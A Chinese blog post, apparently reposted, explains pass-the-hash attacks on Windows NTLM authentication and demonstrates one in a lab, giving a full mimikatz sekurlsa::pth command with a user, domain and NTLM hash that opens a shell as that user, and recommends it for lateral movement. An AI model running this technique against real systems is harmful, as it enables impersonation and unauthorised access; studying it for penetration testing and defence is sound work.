首页 > 其他 > 详细

哈希传递PTH(pass the hash)

时间:2019-10-24 01:56:51      阅读:97      评论:0      收藏:0      [点我收藏+]

pass the hash原理:

在Windows系统中,通常会使用NTLM身份认证,NTLM认证不使用明文口令,而是使用口令加密后的hash值,hash值由系统API生成(例如LsaLogonUser) ,其中hash(哈希)分为LM hash和NT hash,如果密码长度大于15,那么无法生成LM hash。

从Windows Vista和Windows Server 2008开始,微软默认禁用LM hash,如果攻击者获得了hash,就能够在身份验证的时候模拟该用户(即跳过调用API生成hash的过程)


这类攻击适用于:

域/工作组环境

演示:

靶机:win08 r2
攻击:win08 r2

1.靶机中进行读取NTLM HASH:
技术分享图片

2.攻击机执行:

mimikatz.exe "privilege::debug" "sekurlsa::pth /user:administrator /domain:top.pentest.top /ntlm:044dfa0c35b979ed369f7335b5ea20e0"

技术分享图片

会反弹一个cmd窗口回来 发现hash成功传递!!!


总结:在内网渗透中,当我们能够读取ntlm,但是发现抓取不到明文的时候,可以通过hash传递的方式进行横向移动。

对于哈希传递不只是通过mimikatz,还可以通过wce,impacket工具包进行攻击。

哈希传递PTH(pass the hash)

原文:https://www.cnblogs.com/zpchcbd/p/11729691.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!